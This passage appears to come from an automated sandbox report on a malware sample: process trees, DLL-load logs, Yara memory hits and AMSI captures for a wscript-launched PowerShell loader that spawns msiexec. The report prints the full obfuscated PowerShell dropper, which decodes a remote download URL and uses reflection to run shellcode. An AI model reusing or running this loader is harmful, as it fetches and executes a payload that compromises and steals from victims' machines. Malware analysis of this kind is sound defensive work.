'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\lahohqpsrcskvvhwhdioicctkhlgz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vcmhhjaufkkpxkvaqovqlgwctnupsinbp"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xwrzi"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.2423007734.00000000081C5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Core.pdb's)yqV source: powershell.exe, 00000004.00000002.2423007734.00000000081C5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2408368768.000000000741D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2028773495.00000214A7651000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2030876632.00000214A7851000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2373145723.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2408368768.00000000073DA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb' source: powershell.exe, 00000004.00000002.2408368768.0000000007474000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("powershell", "";$Tankningerne249='Knaldfilmens';;$Lan", "", "", "0");
              Source: Yara matchFile source: 00000004.00000002.2426676506.000000000CD89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3313894054.0000000007599000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2426474677.0000000008790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2401223856.0000000005AFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2191640831.00000292999FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($sphaerosome)$gLObAL:cOlOToMy = [system.TeXT.EncODINg]::aScII.gEtStRIng($AtTraCTable)$GLObaL:UDblsER=$coloTomY.suBstriNG($YVERfoRMEr,$BefOrdRIngsFrADRAGenE)<#Svovldioxidforurenings Mi
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Bjeligere184 $Kredittimes $Carte), (Impertinently @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ivrkstterne = [AppDomain]::CurrentDomain.GetAssemblies()$
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fjeldrypers)), $Hofteholder).DefineDynamicModule($byggetilladelserne, $false).DefineType($Selvforvaltning, $Cyclorama, [System.Multica
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($sphaerosome)$gLObAL:cOlOToMy = [system.TeXT.EncODINg]::aScII.gEtStRIng($AtTraCTable)$GLObaL:UDblsER=$coloTomY.suBstriNG($YVERfoRMEr,$BefOrdRIngsFrADRAGenE)<#Svovldioxidforurenings Mi
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL 